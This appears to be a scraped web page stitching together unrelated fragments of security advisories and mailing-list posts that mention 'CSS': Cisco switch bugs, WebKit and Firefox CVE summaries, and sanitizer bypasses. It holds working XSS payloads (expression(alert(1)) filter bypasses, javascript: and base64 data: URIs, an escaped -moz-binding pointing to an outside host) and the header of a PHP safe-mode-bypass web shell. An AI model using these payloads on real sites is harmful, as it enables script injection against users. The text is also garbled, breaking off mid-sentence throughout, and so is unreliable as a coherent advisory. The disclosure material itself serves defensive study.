Next Page >>
Cascading Style Sheets
Security Advisory
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Multiple Cisco CSS / ACE Client Certificate and HTTP Header
Manipulation Vulnerabilities
Release Date: 2010-07-02
Application: Cisco Content Services Switch (CSS) / ACE Products
Versions: Cisco CSS 11500 - 08.20.1.01
Cisco ACE 4710 - Version A3(2.5) [build 3.0(0)A3(2.5)
Shell :
п»ї<html><head><title>* ernealizm * </title><body bgcolor="#000000"><table Width='100%' height='10%' bgcolor='#000000' border='1'>
<tr><td><center><font size="4" color="#FFFFFF"><span style="background-color: #000000">ErNe Safe Mode Bypass For BiyoSecurity.Net</span>
</font></center></td></tr></table>
<style type="text/css">
body,td {
font-family: "Tahoma";
font-size: "12px";
line-height: "150%";
}
May 13, 2008
I. BACKGROUND
Microsoft Word is a word processing application that is distributed with
Microsoft Office. Cascading Style Sheets (CSS) is a stylesheet language
used to describe the presentation of a document written in a markup
language. For more information about Microsoft Word, visit the
following URL.
http://office.microsoft.com/en-us/word/default.aspx
1) "Login Detection" - if the site redirects to a login page when
/myaccount is requested, we know the user is not logged in. Unless I
am mistaken, the same information can be collected through a number of
well-known vectors: image or script onload / onerror events, including
remote CSS or scripts and testing for side effects, page unload
timing, cache timing, CSS :visited, probing frames.length and other
publicly visible global properties, etc.
All of them are well-known (see "Resource inclusion probes" in BSH),
and AFAICT, do not pose any appreciable security risk. They are a
(CVE-2010-2753).
Integer overflow in an array class in Mozilla Firefox 3.5.x before
3.5.11 and 3.6.x before 3.6.7, Thunderbird 3.0.x before 3.0.6 and 3.1.x
before 3.1.1, and SeaMonkey before 2.0.6 allows remote attackers to
execute arbitrary code by placing many Cascading Style Sheets (CSS)
values in an array (CVE-2010-2752).
Multiple unspecified vulnerabilities in the browser engine in Mozilla
Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, Thunderbird 3.0.x
before 3.0.6 and 3.1.x before 3.1.1, and SeaMonkey before 2.0.6 allow
Undocument bug on Cisco CSS series 11000 with Webns 8.20.0.1
Cisco CSS series 11000 with webns system and ssh daemon crash on ssh
crc32 old 2001 exploit
Cisco CSS :
Webns Version: 08.20.0.01 (using command sh ver)
SSH Version: SSHield version 1.6.1, SSH version OpenSSH_3.0.2p1 (using
command sh sshd version)
denial of service, etc.
DETAILS
=======
Cascade Server allows its users to write XSLT stylesheets which it
uses to transform XML source data into HTML or other formats. Cascade
Server employs the Apache XML Project's Xalan-Java XSLT processor to
perform these transformations.
The Xalan-Java site states, "For those situations where you would like
CVE-2009-1698
WebKit in qt4-x11 does not initialize a pointer during handling of a
Cascading Style Sheets (CSS) attr function call with a large numerical
argument, which allows remote attackers to execute arbitrary code or
cause a denial of service (memory corruption and application crash) via
a crafted HTML document.
ANY second appearance of the injected data will allow execution of script
code. The concept is that data inside tags such as script and style is
parsed by their own parser.
The CSS(style) parser has 2 characteristics that differentiate it from the
script parser:
1) It is a silent parser (there is no indication of failure)
2) It is executing as batch operations per block, which means that closing
A NON EXISTING (never opened) block will cause parsing of the following
blocks. What does this mean?!?!
account and then compose an e-mail message, related to a login CSRF
issue (CVE-2011-1491).
steps/utils/modcss.inc in Roundcube Webmail before 0.5.1 does
not properly verify that a request is an expected request for an
external Cascading Style Sheets (CSS) stylesheet, which allows remote
authenticated users to trigger arbitrary outbound TCP connections
from the server, and possibly obtain sensitive information, via a
crafted request (CVE-2011-1492).
Cross-site scripting (XSS) vulnerability in the UI messages
NSFOCUS Security Advisory (SA2007-01)
Microsoft IE5 CSS Parsing Memory Corruption Vulnerability
Release Date: 2007-08-15
CVE ID: CVE-2007-0943
http://www.nsfocus.com/english/homepage/research/0701.htm
use WebKit, such as Epiphany-webkit and Midori, to effect the necessary
changes.
Details follow:
It was discovered that WebKit did not properly handle Cascading Style Sheets
(CSS) import statements. If a user were tricked into opening a malicious
website, an attacker could cause a browser crash and possibly execute
arbitrary code with user privileges.
be freed and later accessed when an HTML error occurs, related to
recursion in certain DOM event handlers. (CVE-2009-1690)
WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1,
and iPhone OS for iPod touch 1.1 through 2.2.1 does not initialize a
pointer during handling of a Cascading Style Sheets (CSS) attr function
call with a large numerical argument, which allows remote attackers to
execute arbitrary code or cause a denial of service (memory corruption
and application crash) via a crafted HTML document. (CVE-2009-1698)
WebKit in Apple Safari before 4.0.2, KHTML in kdelibs in KDE, QtWebKit
"recursion in certain DOM event handlers."
CVE-2009-1698
WebKit does not initialize a pointer during handling of a Cascading Style Sheets
(CSS) attr function call with a large numerical argument, which allows remote
attackers to execute arbitrary code or cause a denial of service (memory
corruption and application crash) via a crafted HTML document.
be freed and later accessed when an HTML error occurs, related to
recursion in certain DOM event handlers. (CVE-2009-1690).
WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1,
and iPhone OS for iPod touch 1.1 through 2.2.1 does not initialize a
pointer during handling of a Cascading Style Sheets (CSS) attr function
call with a large numerical argument, which allows remote attackers to
execute arbitrary code or cause a denial of service (memory corruption
and application crash) via a crafted HTML document (CVE-2009-1698).
KDE Konqueror allows remote attackers to cause a denial of service
ZDI-09-012: Microsoft Internet Explorer Malformed CSS Memory Corruption
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-012
February 10, 2009
-- CVE ID:
CVE-2009-0076
-- Affected Vendors:
Microsoft
arbitrary code, when visiting a malicious website.
CVE-2009-1698
It was discovered that there could be an uninitialised pointer when
handling a Cascading Style Sheets (CSS) attr function call. This could
lead to the execution of arbitrary code, when visiting a malicious
website.
CVE-2009-1687
CVE-2010-4577
The CSSParser::parseFontFaceSrc function in WebCore/css/CSSParser.cpp in
WebKit does not properly parse Cascading Style Sheets (CSS) token sequences,
which allows remote attackers to cause a denial of service
(out-of-bounds read) via a crafted local font, related to "Type Confusion."
CVE-2010-4578
decide Top Sites content.
Once the attack completes execution, the small window gets closed and the
next time you use Safari Top Sites, it will be have the attacker's defined
sites replace your existing legitimate sites. To make this decision of which
sites to replace with, an attacker can first use the CSS History Hack found
by Jeremiah Grossman[2] and then accordingly set fake sites relative to
those user's visited websites. Hence, this could easily facilitate a serious
phishing attack. The situation is worsened by the Safari's inadequate
protection against URL obfuscation attacks as highlighted in [3], which
makes it almost impossible for a regular user to spot the fake site and
* Tomas Hoger discovered an unspecified session fixation
vulnerability (CVE-2009-1580).
* Luc Beurton reported that functions/mime.php does not protect the
application's content from Cascading Style Sheets (CSS) positioning
in HTML e-mail messages (CVE-2009-1581).
Impact
======
www.eVuln.com advisory:
BBCode CSS XSS in slickMsg
Summary: http://evuln.com/vulns/162/summary.html
Details: http://evuln.com/vulns/162/description.html
-----------Summary-----------
eVuln ID: EV0162
Software: slickMsg
Vendor: n/a
Version: 0.7-alpha
Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, Thunderbird
before 3.0.11 and 3.1.x before 3.1.7, and SeaMonkey before 2.0.11 do
not properly validate downloadable fonts before use within an operating
system's font implementation, which allows remote attackers to execute
arbitrary code via vectors related to @font-face Cascading Style Sheets
(CSS) rules (CVE-2010-3768).
The line-breaking implementation in Mozilla Firefox before 3.5.16 and
3.6.x before 3.6.13, Thunderbird before 3.0.11 and 3.1.x before 3.1.7,
and SeaMonkey before 2.0.11 on Windows does not properly handle long
ZDI-10-102: Microsoft Internet Explorer Stylesheet Array Removal Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-102
June 8, 2010
-- CVE ID:
CVE-2010-1262
-- Affected Vendors:
Microsoft
on CherryPy, written in Python. As specialized in Web Application Security, then
obviously I spent some time playing with it.
I used Firefox with Live HTTP Headers Add-On, which provides easy way to observe
HTTP requests and responses. This is what got my attention:
http://localhost:8080/static/browse/browse.css
http://localhost:8080/static/jquery_ui/css/humanity-custom/jquery-ui-1.8.5.custom.css
http://localhost:8080/static/jquery.multiselect.css
Seems like accessing static resources. Norhing unusual. But what if ...
-------------
Microsoft Anti-XSS Library is used to protect applications from Cross-Site Scripting attacks, by providing methods for input sanitization.
Vulnerability
-------------
Microsoft Anti-XSS Library 3.0 and 4.0 are vulnerable to an attack in which an attacker is able to create a specially formed CSS, that after passing through the GetSafeHTML or GetSafeHtmlFragment methods, contains an expression that triggers a JavaScript call in Internet Explorer.
The following ASP.NET code demonstrates the vulnerability:
1. string data = Microsoft.Security.Application.Sanitizer.GetSafeHtml("<html>a<style><!--div{font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'}--></style><div>b</div></html>");
(Opera) <img src="%0Bjavascript:alert(document.domain)">
(Firefox) <a href='%08data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ%2B'>test</a>
3. Cross site scripting - allowed attributes
In some implementations, style attribute is allowed. As kses is not
designed to deal with XSS inside CSS, such configurations are
vulnerable, unless additional checks are added. In reality, code added
for cleaning CSS usually does not solve this problem in sufficient
degree.
Example:
(Firefox) <a style=" ;\2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67: \75\72\6c(\68\74\74\70\3a\2F\2F\68\61\2E\63\6B\65\72\73\2E\6F\72\67\2F\78\73\73\6D\6F\7A\2E\78\6D\6C\23\78\73\73)" href="http://example.com">test</a>
arbitrary code, when visiting a malicious website.
CVE-2009-1698
It was discovered that there could be an uninitialised pointer when
handling a Cascading Style Sheets (CSS) attr function call. This could
lead to the execution of arbitrary code, when visiting a malicious
website.
CVE-2009-1687
CVE-2011-1440
Use-after-free vulnerability in Google Chrome allows remote attackers to cause
a denial of service or possibly have unspecified other impact via vectors
related to the ruby element and Cascading Style Sheets (CSS) token sequences.
CVE-2011-1444
Race condition in the sandbox launcher implementation in Google Chrome on
The JavaScript function toStaticHTML, which is found in Internet Explorer 8 and Internet Explorer 9, is used to sanitize HTML fragments from dynamic and potentially malicious content.
If an attacker can manage to pass malicious code through this function, s/he may be able to perform HTML injection based attacks (such as XSS).
Vulnerability
-------------
An attacker can create a specially formed CSS that after passing through the toStaticHTML function will contain an expression that will trigger a JavaScript call.
The following JavaScript code demonstrates the vulnerability:
<script>document.write(toStaticHTML("<style>div{color:rgb(0,0,0)&a=expression(alert(1))}</style>Adi Cohen"))</script>
head element. If a user were tricked into viewing a malicious website, an
attacker could cause a denial of service or possibly execute arbitrary code
with the privileges of the user invoking the program. (CVE-2009-1690)
It was discovered that KDE-Libs did not properly handle the Cascading Style
Sheets (CSS) attr function call. If a user were tricked into viewing a
malicious website, an attacker could cause a denial of service or possibly
execute arbitrary code with the privileges of the user invoking the
program. (CVE-2009-1698)
Next Page>>
|
